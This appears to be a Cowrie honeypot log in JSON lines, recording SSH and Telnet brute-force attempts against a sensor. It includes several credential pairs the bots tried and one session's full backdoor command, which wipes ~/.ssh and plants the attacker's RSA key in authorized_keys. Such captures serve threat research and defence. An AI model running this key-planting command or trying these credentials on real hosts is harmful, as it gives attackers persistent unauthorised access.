{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.723595Z","src_ip":"46.101.8.63","session":"912a208ebe28"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.851169Z","src_ip":"46.101.8.63","session":"912a208ebe28"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.874182Z","src_ip":"46.101.8.63","session":"de7fe05704fa"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:51:46.874961Z","src_ip":"46.101.8.63","session":"912a208ebe28"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56134,"dst_ip":"1.2.3.4","dst_port":22,"session":"41903b261882","protocol":"ssh","message":"New connection: 217.72.205.35:56134 (1.2.3.4:22) [session: 41903b261882]","sensor":"my-vps","timestamp":"2025-09-08T23:52:11.479264Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:11.480308Z","src_ip":"217.72.205.35","session":"41903b261882"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":51496,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9dae4414f5b","protocol":"ssh","message":"New connection: 45.150.34.92:51496 (1.2.3.4:22) [session: e9dae4414f5b]","sensor":"my-vps","timestamp":"2025-09-08T23:52:30.552859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:30.553720Z","src_ip":"45.150.34.92","session":"e9dae4414f5b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:30.571043Z","src_ip":"45.150.34.92","session":"e9dae4414f5b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"changeme","message":"login attempt [ftpuser/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:52:30.684321Z","src_ip":"45.150.34.92","session":"e9dae4414f5b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:31.703981Z","src_ip":"45.150.34.92","session":"e9dae4414f5b"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":39112,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c34838a9f16","protocol":"ssh","message":"New connection: 182.18.161.165:39112 (1.2.3.4:22) [session: 0c34838a9f16]","sensor":"my-vps","timestamp":"2025-09-08T23:52:34.366934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:34.367595Z","src_ip":"182.18.161.165","session":"0c34838a9f16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:34.626925Z","src_ip":"182.18.161.165","session":"0c34838a9f16"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"qwerty","message":"login attempt [supervisor/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:52:35.706726Z","src_ip":"182.18.161.165","session":"0c34838a9f16"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:36.968494Z","src_ip":"182.18.161.165","session":"0c34838a9f16"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":48250,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4b34bf3541","protocol":"ssh","message":"New connection: 46.101.8.63:48250 (1.2.3.4:22) [session: fa4b34bf3541]","sensor":"my-vps","timestamp":"2025-09-08T23:52:41.975096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:41.976089Z","src_ip":"46.101.8.63","session":"fa4b34bf3541"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:41.998579Z","src_ip":"46.101.8.63","session":"fa4b34bf3541"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus.123","message":"login attempt [nexus/nexus.123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:52:42.128262Z","src_ip":"46.101.8.63","session":"fa4b34bf3541"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:43.153901Z","src_ip":"46.101.8.63","session":"fa4b34bf3541"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":38640,"dst_ip":"1.2.3.4","dst_port":22,"session":"82aef659cc0b","protocol":"ssh","message":"New connection: 93.113.63.124:38640 (1.2.3.4:22) [session: 82aef659cc0b]","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.309399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.321413Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.390524Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.login.success","username":"root","password":"nihao123!","message":"login attempt [root/nihao123!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.720117Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:52:45.965760Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.966443Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:52:45.967428Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.039070Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:52:46.382809Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.383463Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.455505Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.456327Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":38656,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3b3306ab032","protocol":"ssh","message":"New connection: 93.113.63.124:38656 (1.2.3.4:22) [session: c3b3306ab032]","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.525913Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.526704Z","src_ip":"93.113.63.124","session":"c3b3306ab032"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:46.668028Z","src_ip":"93.113.63.124","session":"c3b3306ab032"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:52:47.030633Z","src_ip":"93.113.63.124","session":"c3b3306ab032"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.115399Z","src_ip":"93.113.63.124","session":"c3b3306ab032"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":38668,"dst_ip":"1.2.3.4","dst_port":22,"session":"5765973867e1","protocol":"ssh","message":"New connection: 93.113.63.124:38668 (1.2.3.4:22) [session: 5765973867e1]","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.169334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.174605Z","src_ip":"93.113.63.124","session":"5765973867e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.235057Z","src_ip":"93.113.63.124","session":"5765973867e1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.489823Z","src_ip":"93.113.63.124","session":"5765973867e1"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.552682Z","src_ip":"93.113.63.124","session":"5765973867e1"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:52:48.563158Z","src_ip":"93.113.63.124","session":"82aef659cc0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58097,"dst_ip":"1.2.3.4","dst_port":23,"session":"36c69c00bf14","protocol":"telnet","message":"New connection: 212.227.235.229:58097 (1.2.3.4:23) [session: 36c69c00bf14]","sensor":"my-vps","timestamp":"2025-09-08T23:53:15.945555Z"}
{"eventid":"cowrie.session.closed","duration":17.04915738105774,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:32.994649Z","src_ip":"212.227.235.229","session":"36c69c00bf14"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":45630,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6b236754d4c","protocol":"ssh","message":"New connection: 46.101.8.63:45630 (1.2.3.4:22) [session: a6b236754d4c]","sensor":"my-vps","timestamp":"2025-09-08T23:53:41.080226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:41.081018Z","src_ip":"46.101.8.63","session":"a6b236754d4c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:53:41.104724Z","src_ip":"46.101.8.63","session":"a6b236754d4c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser1234","message":"login attempt [ftpuser/ftpuser1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:53:41.240846Z","src_ip":"46.101.8.63","session":"a6b236754d4c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:53:42.267037Z","src_ip":"46.101.8.63","session":"a6b236754d4c"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":34934,"dst_ip":"1.2.3.4","dst_port":22,"session":"6210d17fcdf7","protocol":"ssh","message":"New connection: 45.150.34.92:34934 (1.2.3.4:22) [session: 6210d17fcdf7]","sensor":"my-vps","timestamp":"2025-09-08T23:53:49.207977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:49.208849Z","src_ip":"45.150.34.92","session":"6210d17fcdf7"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59852,"dst_ip":"1.2.3.4","dst_port":22,"session":"b29ea8204859","protocol":"ssh","message":"New connection: 182.18.161.165:59852 (1.2.3.4:22) [session: b29ea8204859]","sensor":"my-vps","timestamp":"2025-09-08T23:53:50.139493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:53:50.140379Z","src_ip":"182.18.161.165","session":"b29ea8204859"}
